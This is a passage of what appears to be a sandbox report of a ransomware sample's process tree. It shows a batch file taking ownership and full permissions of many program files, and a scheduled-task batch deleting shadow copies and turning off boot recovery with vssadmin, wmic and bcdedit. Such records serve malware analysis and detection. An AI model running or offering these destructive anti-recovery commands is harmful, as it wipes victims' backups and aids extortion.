    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1980
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1116
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1980
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:2020
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:1028

C:\Windows\system32\taskeng.exe
taskeng.exe {25A87DD1-3A43-4D1F-A4EA-278059B25FB8} S-1-5-21-2090973689-680783404-4292415065-1000:UCQFZDUI\Admin:Interactive:[1]
1⤵
PID:1880
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\KAoBt5GB.bat"
  2⤵
  PID:2028
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:572
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1260
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1804